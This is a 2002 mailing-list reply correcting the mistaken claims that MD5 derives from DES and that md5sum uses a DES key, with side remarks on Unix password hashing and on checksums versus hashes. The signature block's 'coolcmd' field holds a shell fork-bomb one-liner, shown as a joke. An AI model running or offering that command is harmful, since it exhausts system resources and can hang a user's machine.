-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Friday 16 August 2002 17:47, Bob the Builder wrote:
> The md5 hashing algorithm is based on the DES encryption algorithm.
I'm sorry, could you prove this claim or is this just somethine you've 'heard
somewhere'? I see no similarity. rfc1186 for MD4, BTW, which MD5 was based
on. A (very) quick search of rfc1186 reveils no mention of DES.
Other information for the topic:
UNIX traditionally uses DES to hash passwords, but some flavours let you use
MD5 instead. OpenBSD uses blowfish by default. I will not argue the security
of blowfish as a hashing algorithm based on it being in OpenBSD since I don't
buy the "OpenBSD is safer" thing[1]. BUT.... in "Applied Cryptography" (page
336 in my copy[2]) you'll see Bruce Schneier[3] saying that it's not suitable
for one-way hash functions. He doesn't say clearly why.
> The point of using md5 is about obtaining a checksum for a given piece of
> data where it is difficult (computationally infeasable) to produce a second
> piece of data that results in the same checksum.
Hmm, I don't know for sure, but isn't 'checksum' the wrong word to use?
Checksums are used to detect errors in transmission, not malicious
alterations. Examples of such are the normal checksums in IP packets which
IIRC are based on polynomial division or something.[4] And malicious
alteration of data without altering the checksum is supposedly trivial.
I think hash value, or hash output, is more correct. But I could be
completely wrong on this one.
[1] It's a big and OT issue.
[2] MD5 is on _4_36, spooky.
[3] Who is the guy that designed blowfish
[4] I have known the theory behind CRC :).
> example the md5sum on unix usually uses a DES key that is just a string of
> zeroes.
I really think you're confusing /etc/passwd with it's different choices of
hashing functions.
- ---------
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomasat_private" };
char kernel[] = { "Linux 2.4" };
char *pgpKey[] = { "http://darkface.pp.se/~thompa/pubkey.txt" };
char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE9YBuNKGrpCq1I6FQRAjR2AKCJ0/KgT52cPQHLyqOawfqVJnfIqwCgz/kt
JCX7Ap+1ZcfSs9poXZKQwVg=
=BIsy
-----END PGP SIGNATURE-----
-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Aug 19 2002 - 03:16:36 PDT